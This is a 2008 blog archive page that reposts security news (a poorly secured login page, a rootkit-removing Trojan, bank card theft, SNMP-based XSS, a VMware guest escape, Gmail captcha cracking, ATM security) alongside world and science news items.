Friday, February 29, 2008

How Not to Secure Your Login Site

Via DailyWTF -

Not too long ago, I added my company, Inedo, to the federal government's Central Contractor Registration system. I don't know, I just didn't want to miss out on all the fun every one seems to have with government work. Whenever one signs up for virtually any government thing, a deluge of companies somehow manage to find to out. The CCR is certainly no exception.

One of the many companies that contacted me after signing up was the Federal Suppliers Guide. The initial cold call went something like this:

FSG Rep: Hi Alex, I've got some great news for you!

(Let me guess... you can save me a lot of money on something...)
Me: Okay...

FSG Rep: We've reviewed your CCR registration, and it looks like your company could be eligible for placement in our guide!

(Wow, that *is* great news!)
Me: Your guide?

FSG Rep: The Suppliers Guide! It's used *exclusively* by state and federal agencies to purchase services and products. Anyway, to confirm your eligibility, I'll need to ask a few questions. First, where are you located?

--- snipped a total of three questions asked ---

FSG Rep: Okay... well, let me punch this in here -- clickity clickity clicky -- wow! This is really good! You are, in fact, eligible for the guide! Would you like to be in our guide?

(There's no possible way there could be any sort of catch here...)
Me: Sure! Why not?

FSG Rep: Fantastic! There's just a nominal fee to get started, so if you'll just get me your credit card number we can--

Me: How much is the nominal fee?

FSG Rep: Heh, it's really very little actually. It's a fantastic investment that ranges anywhere from six hundred to several thousand.

Me: I can't make that decision right now; can you send me over some information?

FSG Rep: Oh. You can't? Well, I mean, I guess I could send you more information... but you know, I can just answer any questions you have now. I mean, I'd hate for you to lose your eligibility, that's all!

(What a nice guy! And this whole time, I thought he was a fast-talking salesman...)
Me: I guess we'll just have to take that risk; can you also send me a copy the guide, too?

FSG Rep: Err, gee... well, you know... that's the one thing I can't do. You see, these guides are to be used *exclusively* by government agents. We can't just give them to anyone, you know.

(And to think, I was questioning whether they were even legitimate!)
Me: Okaaaay... just send me what you can then.

After a bit more back-and-forth about how he could "just answer any questions I had right now", the sales rep pointed me to their sample ads, a 7mb PDF with sixteen pages of seemingly real companies, all with the same phone number (555-555-5555) and the same website ( Somehow, that didn't convince me to "invest" several hundred dollars, so the salesman faxed over some more information with a single, real ad.

As I eagerly waited for the follow-up call later that day, I thought I'd take a minute or two to check out their website. Almost immediately, I came across their Federal Procurement Officers Only page. Out of curiosity, I entered a username and password, and then clicked the Login button. Instantly, a JavaScript dialog popped-up...


What happen after that? You will have to check the DailyWTF site above...or look at the site yourself [hint look at the HTML source code].

Of course, it would not be wise to use the login information that is basically handed out like this story blowing up and accessing a system without auth could get you in legal trouble.

Thursday, February 28, 2008

Malware Removes Rival Rootkits

Via The Channel Register -

Miscreants have created a strain of malware capable of removing rootkits from compromised PCs, only to install almost undetectable backdoor code of its own.

The Pandex Trojan stops previously installed rootkits from working by removing their hooks into system calls. Pandex then installs its own rootkit component, detected by Trend Micro as Pushu-AC.

Diebold Accidentally Leaks Results Of 2008 Election Early

Via The Onion -

Diebold Accidentally Leaks Results Of 2008 Election Early

HSBC Confirms Customer Card Data Was Stolen

Via -

HSBC confirmed that thieves stole card payment data from the bank and they were reissuing 6,000 atm/debit cards to customers affected by the breach. One Consumerist reader, Keith, had $2000 stolen from him via an ATM in Bulgaria, and another, Emily, had $2,800 siphoned from her account from ATMs located clear across the country. (Emily also got interviewed on WCBS and we got a mention and a screenshot). Checking the comments section, it looks like 11 other Consumerist readers were affected by the HSBC fraud as well, with a number of the fraudulent withdrawals being made from Montreal and Canada. Sounds like the thieves stole the data, which contained both card numbers and PIN codes, and then cloned ATM/debit cards. If you're an HSBC customer, might be a good time to change your PIN number.

Professor Faces 180 Lashes for Having Coffee With Student

Via Fox News -

A university professor allegedly caught in a Saudi-style honey trap has been sentenced to 180 lashes and eight months in jail — for having coffee with a girl.

The man, a prominent and well-respected Saudi teacher of psychology at Umm al-Qra University in the holy city of Mecca, was framed by the religious police after he angered some of their members at a training course, his lawyer said.

The academic has not been named by the local media, which have given his case wide coverage, but one senior Saudi journalist told The Times he was Dr. Abu Ruzaiz, a married man in his late 50s with children.

“He is highly respected and above-board. Nobody believes the religious police’s version of what happened. The whole of Jeddah (the main city near Mecca) is in uproar about this. Everyone believes he is innocent and was set up,” the journalist said.

Contact between unrelated men and women is strictly prohibited in the desert kingdom where religious police, commonly known as mutaween, patrol public places in teams to enforce their brand of ultra-conservative Islam.

Usually bearded and often wielding canes, they ensure women are not harassed, sexes do not mix and shops close for prayers. They are under the command of the Saudi Commission for Promotion of Virtue and Prevention of Vice.

Abdullah Al-Sanousi, the academic’s lawyer, told local newspapers that his client had drawn the ire of some of the Commission’s staffers for speaking at length during a training session about how important it was for them to be polite to the public. Some of the trainees also wanted revenge because they had failed the course while others were not happy with their examination results.

Ruzaiz is said to have received a call from a girl purporting to be one of his students who asked to meet to discuss a problem that she did not want to talk about over the phone. The professor agreed to meet at a family cafe, provided she brought her brother along as a chaperone.

When he arrived, he was surprised to find the girl alone, and was promptly surrounded by religious policemen who handcuffed him and hauled him into custody. He was accused of being in a state of khulwa — seclusion — with an unrelated woman.

Nanotechnology-based Clean Hydrogen for Cars

Via ZDNet -

According to EE Times, a California-based company called QuantumSphere has developed nanoparticles that could make hydrogen cheaper than gasoline. The company says its reactive catalytic nanoparticle coatings can boost the efficiency of electrolysis (the technique that generates hydrogen from water) to 85% today, exceeding the Department of Energy’s goal for 2010 by 10%. The company says its process could be improved to reach an efficiency of 96% in a few years. The most interesting part of the story is that the existing gas stations would not need to be modified to distribute hydrogen. With these nanoparticle coatings, car owners could to make their own hydrogen, either in their garage or even when driving.

Here is the business plan of QuantumSphere according to EE Times. “QuantumSphere’s plan is first to retrofit existing electrolysis equipment with its nanoparticle electrodes to boost efficiency. Next, it intends to partner with original equipment manufacturers to design at-home and on-vehicle electrolysers for making hydrogen from water for fuel cells. Finally, the company wants to work with fuel cell makers to replace their expensive platinum electrodes with inexpensive stainless-steel electrodes coated with nickel-iron nanoparticles.” The question is: will this plan work?

Now, let’s move to technical details. “The nanoparticles are perfect spheres, consisting of a couple hundred atoms measuring from 16 to 25 nanometers in diameter. They are formed by means of a vacuum-deposition process that uses vapor condensation to produce highly reactive catalytic nanoparticles, for which the engineering team has formulated several end-use applications. ‘Our biggest engineering challenge was finding a way to get the nanoparticles to stick to metal electrodes,’ McGrath said. The company has solved that problem, she said, ‘enabling existing electrolysis equipment to realize a 30 percent increase in hydrogen output just by retrofitting our coated electrodes.’”

Liberty Hill ISD Dumps Personal Data in Trash Bin

Via (Local Austin) -

Parents give schools lots of personal and private information about their children. They expect they will keep that information safe and secure and away from prying eyes. But that's not the case for one local school district.

Lots of confidential files were left out in a bin in the district's parking lot.

CBS 42 Investigative Reporter Nanci Wilson shows just how easy it was to walk off with boxes of students' and employees' personal information.


Check out the video for more details.

I just love to see female news reporters in business pant suits digging around in the trash...dumpster diving, business class style.

Cyberspace as a Combat Zone: The Phenomenon of Electronic Jihad

Alongside military jihad, which has been gaining momentum and extracting an ever growing price from many countries around the globe, Islamists have been developing a new form of warfare, termed "electronic jihad," which is waged on the Internet. This new form of jihad was launched in recent years and is still in its early stages of development. However, as this paper will show, Islamists are fully aware of its destructive potential, and persistently strive to realize this potential.

Egypt Bans Human Rights Booklets Distributed In Schools

Via The MEMRI Blog -

Local authorities in Upper Egypt have banned the distribution of educational booklets advocating human rights, stating that they pose a threat to state security.

The booklets were distributed to pupils in Egyptian schools as part of a U.S.-funded initiative implemented by the Arab Organization for Reform.

Source: Al-Mustaqbal, Lebanon, February 27, 2008

A1one in Tehran

This is A1one (Tanha), From Tehran , IRAN. Maybe i am a Vandal or Anarchist. But i am glad to introduce my self as one. At least i stand for my right. I am not about politics. But i am interested on social Subjects. I express through Graffiti, wall painting, stencil spray, wheatpastes and Stickers in streets of Tehran and other places.


I found A1one by way of the Arab Culture Blog over at MEMRI.

Also, check the Iranian Underground Art Movement website.

Wednesday, February 27, 2008

National Collegiate Cyber Defense Competition 2008

2007 NCCDC Results

Congratulations to Texas A&M on winning the second National Collegiate Cyber Defense competition. We would like to take a moment to thank all of the teams who participated for making this a great experience. The professionalism and the manner in which each team conducted themselves throughout the weekend could not have been any better. The race was tight throughout the weekend and each team and the institutions they represented should be extremely proud of their efforts. A complete list of competitors and the final standings can be found here.

We would also like to thank the Department of Homeland Security for their continued support of the competition. DHS also made the announcement that they will be sponsoring the winning team to attend and participate in Cyberstorm II. Having taken part in the last Cyberstorm, we know what a great opportunity this is for Texas A&M and look forward to hearing about their experiences.

All of our white and red team volunteers and our sponsors deserve special recognition as well. These competitions are very difficult and costly to put together and without the overwhelming support we receive from the community and industry this competition, as well as the regional competitions, would not be possible.


2008 National Collegiate Cyber Defense Competition
April 18th - 20th 2008
San Antonio, TX


I love the sponsors.

O'Reilly, Pizza Hut, ThinkGeek & Pepsi - now that is one hell of a hacker LAN party. ;)

CO2-Absorbing Crystals Just the Tip of Iceberg for UCLA Lab

Via -

LOS ANGELES -- Researchers at UCLA made headlines this month by developing a nanoscale crystal that traps roughly 80 times its volume of carbon dioxide. This particular crystal has excited proponents of carbon-capture technology for its ability to absorb CO2 and nothing else, but the process that head researcher Omar Yahgi and his lab used to develop the compound is potentially much more significant.

Yahgi’s lab employs automation techniques frequently found in the biotech and pharmaceutical industry to rapidly test crystal samples on a scale not previously possible, which has led to an avalanche of new discoveries. At one point, the technique was yielding so many potentially useful compounds that Yahgi had to ask his students to stop so they could publish their findings. Possible uses for crystals that can selectively absorb specific molecules are numerous, including military applications and hydrogen-fuel storage for green vehicles.

Foreign Hacker Targeting U.S. Health Care Records

Via CNET -

According to a recent article in Federal Computer Week, foreign criminal hackers are targeting American health records.

Mark Walker of DHS Critical Infrastructure Protection Division recently told a National Institute of Standards and Technology workshop that the hackers' primary motive seems to be espionage. For example, any health problems among the nation's leaders would be of interest to potential enemies, he said.

Walker cited two events from 2007. In one, a virus was placed on the Centers for Disease Control and Prevention Web site. In another, there was a known data breach in the Tricare records for the Military Health System.

The Department of Homeland Security wants to build a database of health care-related data breaches. At present, Walker told the workshop that the DHS only has a vague understanding of data loss connected with health care services.

Killer Robots Pose Latest Militant Threat

Via -

LONDON (Reuters) - Killer robots could become the weapon of choice for militants, a British expert said on Wednesday.

Noel Sharkey, professor of artificial intelligence and robotics at the University of Sheffield said he believed falling costs would soon make robots a realistic option for extremist groups.

Several countries and companies are developing the technology for robot weapons, with the U.S. Department of Defense leading the way. More than 4,000 robots are deployed in Iraq.

"The trouble is that we can't really put the genie back in the bottle. Once the new weapons are out there, they will be fairly easy to copy," Sharkey will tell a one-day conference organized by Britain's Royal United Services Institute on Wednesday.

"How long is it going to be before the terrorists get in on the act? With the current prices of robot construction falling dramatically and the availability of ready-made components for the amateur market, it wouldn't require a lot of skill to make autonomous robot weapons."

Sharkey said a small GPS-guided drone with autopilot could be made for about 250 pounds ($490).

Tuesday, February 26, 2008

Using SNMP to Stage XSS Attacks

Via DarkReading -

It’s yet another new spin on a pervasive attack -- this time using the old standby Simple Network Management Protocol (SNMP) to stage cross-site scripting (XSS) attacks.

XSS, which basically forces a Website to echo malicious code that then gets loaded into a user's browser, is one of the most common vulnerabilities in Web applications. Researchers with ProCheckUp Ltd. recently discovered what they think may be a new type of attack vector, using SNMP to create a “persistent XSS” attack. Persistent XSS is a more powerful XSS attack where malicious code is stored on a Website for a period of time, and all the user has to do is view the page to get infected.

With SNMP, the attacker changes parameters in the device to then launch a persistent XSS attack. ProCheckUp found the SNMP-XSS vulnerability, as well as several others, while researching ZyXEL’s Prestige gateway products, which are commonly used in home, SOHO, and ISP networks.

“A persistent XSS attack is launched when the parameters containing the payload are printed on the browser via the web interface of the device,” writes Adrian Pastor, a security consultant with ProCheckUp, in a report. The problem lies in part with the fact that ZyXEL’s Prestige products run with SNMP, HTTP, and telnet in default mode on its WAN interface, Pastor says. “This is at least true among the ISPs used by some of our customers who we offer penetration testing services for,” he writes.

XSS expert RSnake -- aka Robert Hansen, CEO of SecTheory -- says using SNMP to launch an XSS attack is definitely an interesting approach. “It's hard to say that it's new since lots of exploits use logging variables to instantiate the XSS attack, but that's definitely the first time I've heard SNMP [being] used."

RSnake says SNMP and Web application hackers don’t typically intersect, so the attack method is an interesting mix: "Lots of hackers use SNMPwalk, but not many Web app hackers."

Hacker Steals Data on 18M Customers in South Korea Using CSRF

Via DarkReading -

South Korea’s largest online shopping site earlier this month was attacked by a Chinese hacker who made off with the user information on 18 million members and a large amount of financial data.

According to reports on Hack in the Box and the Web Application Security Consortium Incident Report, has disclosed the theft of data from some 18 million buyers and sellers.
The attack was launched from China's internet. After the incident, received a phone call offering to exchange the user information for money, the reports said.

According to a report on Dark Visitor, a security blog site, the Chinese hacker did not directly attack the server. The hacker sent out bulk emailings to the auction staff containing “hacker procedures" that may have contained malware. When the staff members confirmed the emails, the hacker was able to gain their IDs. The hacker was then able to log into the Auction server using the staffer’s ID.

The WASC report categorizes the exploit as a cross-site request forgery attack. "The attack description is vague, but can be best described as session hijacking," the organization said. waited 20 hours after the attack before confirming the loss of information, according to the Korean site Korean users rebuked the Website for being too slow to act, the reports said.


Are PMs and programmers trying to tell you that CSRF isn't a big deal??

Well, here is your ammo...

Hacker's Poised To Beat Apple's Latest Version Of DRM

Via InformationWeek -

One of the hotter memes over the weekend had to do with a cease and desist letter that the ever-litigious Apple sent to the operators of the Hymn Project. For those looking to remove Apple's copy protection technology (officially "FairPlay," but I call it "C.R.A.P.") from iTunes Music Store (iTMS)-bought content, the Hymn Project has been the go-to site for utilities that have managed to stay one step ahead of Apple in what has been a cat and mouse game.

That cat n' mouse game has traditionally involved the companies (Apple, Microsoft (NSDQ: MSFT), etc.) whose copy protection or Digital Rights Management (DRM) technologies are theoretically designed to protect the rights of rights-holders (eg: the record labels) versus the consumers of that content, many of whom believe their own rights are being trampled in the course of trying to protect the rights of the aforementioned rights holders. Not helping matters are a smaller but prolific group of content pirates who have no rights at all to the content in question (in other words, they've never made a purchase), but who have played a significant role in the illegal proliferation of unauthorized and unlicensed content through file-sharing networks.

Despite trying, neither Apple nor Microsoft (the two main purveyors of DRM technology) have been able to keep outfits like the Hymn Project from defeating their latest technical measures designed to put an end to the cat n' mouse game.

One question that remains largely unanswered is "Why did Apple wait so long to use its legal options against the Hymn Project?" Over the weekend, several DRM and Apple-watchers speculated that the latest hack made available through the Hymn Project (known as "Requiem") pushed Apple over the edge because of the decryption techniques it used -- techniques that may have put Apple at a far more serious disadvantage in that cat n' mouse game that it has ever been.

Corn Genome Fully Mapped

Via -

WASHINGTON, Feb 26 (Reuters) - Researchers have sequenced the gene map of corn, also known as maize, a key crop across much of the world and a source of food, oil and products ranging from shoe polish to ethanol.

They said their sequence, to be released at a meeting in Washington on Thursday, would help plant scientists improve varieties of corn and other cereal crops, including rice, wheat and barley.

"Scientists now will be able to accurately and efficiently probe the corn genome to find ways to improve breeding and subsequently increase crop yields and resistance to drought and disease," Richard Wilson of Washington University in St. Louis, whose team led the effort, said in a statement.

The effort to sequence the entire gene map of corn has cost $29.5 million, funded by the National Science Foundation, the U.S. Department of Agriculture and the U.S. Department of Energy.

Pakistan Lifts Curbs on YouTube

Via AP -

ISLAMABAD, Pakistan (AP) — Pakistan's telecoms regulator said Tuesday it has lifted restrictions on the YouTube Web site that led to the knocking out of access to the popular video-sharing site in many other countries for a few hours over the weekend.

The Pakistan Telecommunication Authority ordered 70 domestic Internet service providers to restore access to the site after removal of what government officials had deemed a "blasphemous" video clip.

Pakistan ordered YouTube blocked on Friday over a clip featuring a Dutch lawmaker who has said he plans to release a movie portraying Islam as fascist and prone to inciting violence. As a result, most of the world's Internet users lost access to YouTube for several hours on Sunday.

An Internet expert said Sunday's problems came after a Pakistani telecommunications company complied with the block by directing requests for YouTube videos to a "black hole." So instead of serving up videos of skateboarding dogs, it sent the traffic into oblivion.

The problem was that the company also accidentally identified itself to Internet computers as the world's fastest route to YouTube, which is owned by Google Inc. That led requests from across the Internet to the black hole.

The outage highlighted yet another of the Internet's vulnerabilities, coming less than a month after broken fiber-optic cables in the Mediterranean took Egypt off line and caused communications problems from the Middle East to India.

Monday, February 25, 2008

Scotland Yard Careers Website Defaced

Via The Register -

Unknown hackers defaced the Metropolitan Police's careers website over the weekend.

Digital graffiti on featured a picture of a greenish cuddly monster (vaguely resembling Sulley from Monsters Inc) and a message mocking Scotland Yard's anti-terrorism unit.

The offending message has since been purged from the site. The digital graffiti attack is of little importance, but no less embarrassing for Scotland Yard.

Netcraft reports that the site runs on a Windows 2000 platform.

Spammers Crack Gmail Captcha

Via The Register -

Spammers, fresh from the success of cracking the Windows Live captcha used by Hotmail, have broken the equivalent system at Gmail.

Internet security firm Websense reports that miscreants have created bots which are capable of signing up and creating random Gmail accounts for spamming purposes, defeating Captcha-based defences in the process. It reckons the same group of spammers are behind both attacks.

Captcha (Completely Automated Public Turing test to tell Computers and Humans Apart) challenge-response systems, which are used to prevent accounts being created until a user correctly identifies letters in an image, are designed to ensure requests are made by a human rather than an automated program. The technique has been used to defeat automatic sign-ups to email accounts by services including Yahoo! Mail and Gmail for years, and hackers are increasingly successful in defeating the approach. For example, the HotLan Trojan has created more than 500,000 spam email accounts with Hotmail, Yahoo! and Gmail since its arrival back in July 2007.

Websense reckons the latest Gmail Captcha hack is the most sophisticated it has seen to date. Unlike Live Mail Captcha breaking, which involved just one zombie host doing the entire job, the Gmail breaking process involves two compromised hosts. Each of the two compromised hosts applies a slightly different technique to analysing Captcha, as explained in a posting by Websense.

Even using the two techniques, only one in every five Captcha-breaking requests are successful. It's a fairly low percentage, but one that's still more than workable in the case of automated attacks.

It sounds like a lot of effort, but gaining a working Gmail account has a number of advantages for spammers. As well as gaining access to Google's services in general, spammers gain a address whose domain is highly unlikely to be blacklisted, helping them defeat one aspect of anti-spam defences. Gmail also has the benefit of being free to use.

Guide to the Secure Configuration of Red Hat Enterprise Linux 5

Full Guide

Hardening Cheat Sheet

  • Do not attempt to implement any of the recommendations in this guide without first testing in a non-production environment.
  • This document is only a guide containing recommended security settings. It is not meant to replace well-structured policy or sound judgment. Furthermore this guide does not address site-specific configuration concerns. Care must be taken when implementing this guide to address local operational and policy concerns.
  • The security changes described in this document apply only to Red Hat Enterprise Linux 5. They may or may not translate gracefully to other operating systems.
  • Internet addresses referenced were valid as of 1 July 2007.


Don't be silly and follow this guide line by line. It has tons of great security tips in it, but it is made for the US Government...not for Bob's pizza joint.

Use common sense and apply security measures where they make sense. Some of the "recommended" tips in these guides are not healthy for a corporate bottom-line.

Use the force and find the balance.


With that being said, I was able to also use several of the tips in securing my CentOS VM image that I use for security testing.

Critical VMware Shared Folders Vuln Still Open

Via Computerworld -

A critical vulnerability in VMware Inc.'s virtualization software for Windows lets attackers escape the "guest" operating system and modify or add files to the underlying "host" operating system, the company has acknowledged.

As of Sunday, there was no patch available for the flaw, which affects VMware's Windows client virtualization programs, including Workstation, Player and ACE. The company's virtual machine software for Windows servers and for Mac- and Linux-based hosts are not at risk.

The bug was reported by Core Security Technologies, makers of the penetration-testing framework CORE IMPACT, said VMware in a security alert issued last Friday. "Exploitation of this vulnerability allows attackers to break out of an isolated guest system to compromise the underlying host system that controls it," claimed Core Security.

According to VMware, the bug is in the shared-folder feature of its Windows client-based virtualization software. Shared folders let users access certain files -- typically documents and other application-generated files -- from the host operating system and any virtual machine on that physical system.

"On Windows hosts, if you have configured a VMware host-to-guest shared folder, it is possible for a program running in the guest to gain access to the host's complete file system and create or modify executable files in sensitive locations," confirmed VMware.

VMware has not posted a fix, but it instead told users to disable shared folders.


etails on the exact nature of the vulnerability can be found over at

Sunday, February 24, 2008

Svalbard Global Seed Vault - Feb 26 Inauguration

Via -

Aimed at providing mankind with a Noah's Ark of food in the event of a global catastrophe, an Arctic "doomsday vault" filled with samples of the world's most important seeds will be inaugurated here Tuesday.

European Commission President Jose Manuel Barroso and Nobel Peace Prize winning environmentalist Wangari Matai will be among the personalities present at the inauguration of the vault, which has been carved into the permafrost of a remote Arctic mountain, just some 1,000 kilometres (620 miles) from the North Pole.

The vault, made up of three spacious cold chambers each measuring 27 x 10 metres (89 x 33 feet), create a long trident-shaped tunnel bored into the sandstone and limestone.

It has the capacity to hold up to 4.5 million batches of seeds from all known varieties of the planet's main food crops, making it possible to re-establish plants if they disappear from their natural environment or are obliterated by major disasters.

"The facility is built to hold twice as many varieties of agricultural crops as we think exist," explained Cary Fowler, executive director of the Global Crop Diversity Trust and project mastermind.

"It will not be filled up in my lifetime, nor in my grandchildren's lifetime," he predicted in a phone interview with AFP.

Norway has assumed the six million euro (8.9 million dollar) charge for building the vault in its Arctic archipelago of Svalbard, where ironically no crops grow.

Secured behind an airlock door, the three airtight chambers have the capacity to house duplicates of samples from all the world's more than 1,400 existing seed banks.

Many of the more vulnerable seed banks have begun contributing to the "doomsday vault" collection, but some of the world's biodiversity has already disappeared, with gene vaults in both Iraq and Afghanistan destroyed by war and a seed bank in the Philippines annihilated by a typhoon.

By the time of the inauguration on Tuesday, the Svalbard Global Seed Vault should hold some 250,000 samples, which will remain the property of their countries of origin.

Pakistan and Kenya, both undergoing periods of serious unrest, have sent seed collections, while samples sent from Colombia have been closely scrutinised by police to avoid the project becoming a vehicle for drug trafficking.

"I've been working in this field for 30 years and I thought I knew at least all the crops," Fowler said.

After receiving a list of all the different seeds in the vault, however, "I must admit there are a number of crops I've never heard of before," he said.

Google Mounts Chewbacca Defense in EU Privacy Debate

Via The Register -

Over at The Official Google Rhetoric Blog, the world's largest search engine continues to muddle the debate over the privacy of IP addresses.

As the European Union
questions whether IP addresses should be considered "personal data" - "personally identifiable information" in American parlance - Google software engineer Alma Whitten brings up the issue and then spends several paragraphs failing to address it.

With her blog post, Whitten points our that "the IP addresses that people use can change frequently":

For instance, your Internet service provider (ISP) may have a block of 20,000 IP addresses and 40,000 customers. Since not everyone is connected at the same time, the ISP assigns a different IP address to each computer that connects, and reassigns it when they disconnect (the actual system is a bit more complex, but this is representative of how it works). Most ISPs and businesses use a variation of this "dynamic" type of assigning IP addresses, for the simple reason that it allows them to optimize their resources.

Because of this, the IP address assigned to your computer one day may get assigned to several other computers before a week has passed. If you, like me, have a laptop that you use at work, at home, and at your corner café, you are changing IP addresses constantly. And if you share your computer or even just your connection to your ISP with your family, then multiple people are sharing one IP address.
Yes, it's all true. Your IP address can change. And sometimes, you share an IP address with others. But the same goes for phone numbers.

Sure, you can say that sometimes IP addresses don't map back to particular individuals. But this also means that sometimes they do.

"With dynamic addressing, there are circumstances where an IP address might not be personally identifiable," Mark Rotenberg, the executive director of the Electronic Privacy Information Center (EPIC), told The Reg. "But increasingly, in a vast majority of cases, it is personally identifiable - particularly when it's linked to search queries that are date and time stamped."

Last month, Rotenberg went toe-to-toe with Google global privacy counsel Peter Fleischer in front of the EU parliament, and he's adamant that as time goes on, IP addresses will only get more personal. "This becomes an even bigger problem as we move to the IPv6 environment, which has plenty of address space to uniquely identify actual devices."

What's more, dynamic IP addressing doesn't always prevent personal identification. ISPs typically keep logs of when your address was what, and courts can subpoena this information in much the same way they can subpoena information from Google.

Of course, Alma Whitten goes on to say that Google has done a great deal to guard user privacy in recent months, including "anonymizing" its search logs. Um, last we checked, the company had agreed to anonymize its search logs once they're 18 to 24 months old, and anonymize meant "changing some of the bits" in a stored IP address, making "it less likely that the IP address can be associated with a specific computer or user."

Actually, it's still unclear if this "anonymization" is actually in effect. Back in March, Google said it would happen "within a year's time," and when we asked the company about its progress, it said: "We'll get back to you."

Whitten also claims that Google has "shortened cookie lengths". But as we've said
before, this affects no one but criminals and dead people.

The Dark Side of Light: Brownian Fractals

Via -

Light may not seem very interesting in our everyday lives. But to scientists, light’s properties are a constant source of intrigue. The nature of light as both wave and particle, light as the universal speed limit, and the way light interacts with magnetic fields in the atmosphere to form auroras are a just a few examples of light’s fascinating behavior.

Recently, researchers from the University of Glasgow and the University of Bristol in the UK have discovered another unusual property of light – or, more accurately, the darkness within light. As the researchers explain, natural light fields are threaded by lines of darkness, which create optical vortices that appear as black points within the light. The group has modeled this phenomenon, and found that the lines of darkness exhibit fractal properties with Brownian (random) characteristics. Further, the characteristics of these optical vortices suggest universal properties, which could help connect different areas of physics.

Many people have noticed the phenomenon of laser speckle, which occurs when coherent, monochromatic laser light bounces off a rough surface, giving the surface a speckled appearance. The black specks are interference patterns generated by a superposition of highly coherent light waves reflected from different points on the rough surface. Sometimes the speckled pattern can even appear to sparkle when the viewer moves relative to the surface.

In a recent issue of Physical Review Letters, the UK researchers describe how they developed a model of the superpositions that create the dark optical vortices, using numerical simulations and experiments. In their experiments, they created laser speckle with a 10-mm-diameter helium neon laser beam shining through a screen made of ground glass.

By measuring the superpositions with an interferometer, the scientists could generate a 3D map of the structure of the optical vortices. They found two types of vortices. Infinite vortex lines, which account for about 73% of the dark vortices, percolate entirely through the light beam. The remaining 27% of the vortices form closed loops, which occur when a vortex line returns to its starting point within a small enough area.

When investigating the lines of darkness further, the researchers found that they exhibit scale invariance. In other words, the vortices look the same no matter how much you zoom out – they are fractals. Lead author Kevin O’Holleran of the University of Glasgow said that, while he and his colleagues suspected vortex lines to exhibit fractal properties, they were quite surprised to find that the fractality was of a Brownian nature.

One of FBI Most Wanted Appears in Yemen

Via Asharq Alawsat Newspaper -

SAN`A, Yemen, (AP) - A Yemeni-American who is among the FBI's most wanted terrorism suspects appeared in a Yemeni court Saturday and then walked free, an eyewitness said.
Jaber Elbaneh, 41, attended a session of the trial for him and 22 others charged in connection with a series of attacks on oil facilities.

"He entered the courtroom surrounded by four bodyguards, introduced himself to the judge then he left," an eyewitness said speaking on condition of anonymity because of security concerns.

Footage of Elbaneh entering and leaving the court unimpeded also appeared on the Dubai-based pan-Arab satellite channel, al-Arabiya.

Security authorities have declined to comment on Elbaneh's legal situation.

Elbaneh is a former resident of Lackawanna, N.Y. He left the United States in spring 2001 as part of a larger group that authorities said traveled to Osama bin Laden's al-Farooq training camp in Afghanistan.

In May 2003, U.S. prosecutors charged Elbaneh in absentia with conspiring with a group known as the "Lackawanna Six" to provide material support or resources to a foreign terrorist organization.

The U.S. asked Yemen to hand over Elbaneh and while he was subsequently arrested by authorities in January 2004, he was never extradited.

Elbaneh and 22 other prisoners broke out of their Yemeni jail in February 2006 by digging a tunnel to a nearby mosque. Elbaneh surrendered in May to Yemeni authorities but was never sent back to jail despite the ongoing trial.

The U.S. is offering up to $5 million for information leading to his arrest.


Looks like even is looking for him as well...

Bihar Police Seize 4 kg of Uranium Near Nepal Border

Via Rediff India Abroad (Feb 19th) -

The Bihar police have seized four kg of low-grade uranium in the Supaul district near Nepal border and arrested six persons in this connection, sources said on Tuesday.

The seized uranium is estimated to value crores of rupees in international market.

Police sources in the Supaul district superintendent of police confirmed that four kg of low-grade uranium seized at a bus stop near Nepal border.

"The police with the active help of SSB jawans deployed on the Indo-Nepal border seized four kg uranium from suspected smugglers," the police said.

The police arrested six persons, including a school teacher, and an SSB jawan posted in Assam.

A senior police official told over telephone that the police suspect that seized uranium were being smuggled from Meghalaya and arrested persons were planning to send it to Nepal.

Pakistan Blocks YouTube for 'Blasphemous' Content

Via Asharq Alawsat Newspaper -

ISLAMABAD (AFP) - Pakistan has ordered all Internet service providers to block the YouTube website for containing "blasphemous" content and material considered offensive to Islam, officials said Sunday.

An inter-ministerial committee has decided to block YouTube because it contained "blasphemous content, videos and documents," a government official told AFP.

"The site will remain blocked till further orders," he said.

Other officials said the site had been blocked because it contained controversial sketches of the Prophet Mohammed which were republished by Danish newspapers earlier this month.

One major service provider, Micronet, said in an email to subscribers that the Pakistan Telecommunications Authority had directed all ISPs to block access to YouTube "for containing blasphemous web content/movies."

"Meanwhile Internet users can write to to remove the objectionable web content/movies because this removal would enable the authorities to order un-blocking of this website," the email said.

Saudi Men Arrested for Flirting

Via BBC -

Prosecutors in Saudi Arabia have begun investigating 57 young men who were arrested on Thursday for flirting with girls at shopping centres in Mecca.

The men are accused of wearing indecent clothes, playing loud music and dancing in order to attract the attention of girls, the Saudi Gazette reported.

They were arrested following a request of the Commission for the Promotion of Virtue and Prevention of Vice.

The mutaween enforce Saudi Arabia's conservative brand of Islam, Wahhabism.

Earlier in the month, the authorities enforced a ban on the sale of red roses and other symbols used in many countries to mark Valentine's Day.

The ban is partly because of the connection with a "pagan Christian holiday", and also because the festival itself is seen as encouraging relations between the sexes outside marriage, punishable by law in the kingdom.

The Prosecution and Investigation Commission said it had received reports of such "bad" behaviour by 57 young men at a number of shopping centres in the holy city of Mecca, the Saudi Gazette said.

The guardians of some of the men defended their actions, however, saying they would regularly get together at the weekend to have fun without ever violating laws governing the segregation of the sexes, it added.

Banks Failing on ATM Security

Via -

Banks and financial institutions are leaving customers' personal details vulnerable to hackers by failing properly to secure their ATMs, according to a new report.

Managed security firm Network Box cited three main threats to ATMs: IP worms, disruption of the IP network and denial of service, and the harvesting of transaction data for malicious purposes.

The company said that ATM security risks have increased because of the changing ways in which they operate.

Many ATMs were built on proprietary hardware, software and communications protocols.

But it is estimated that 70 per cent of current ATMs are based on PC/Intel hardware and commodity operating systems using standard IP networking with some additional peripherals housed in a secure vault-like box.

The report attributes the changes to advantages in cost, performance, flexibility, standardisation and functionality, but points out that these advantages bring increased threats.

In these newer systems the ATM is connected to the payment processor using a TCP/IP connection. However, while the Pin is triple-DES encrypted, the messages themselves are not.

This leaves card numbers, expiry dates, transaction amounts and account balances clearly readable.

A hacker needs only to access some part of the IP network between the IP-ATM and the payment processor to gather the details.

Saturday, February 23, 2008

802.11 Attacks - Foundstone Whitepaper

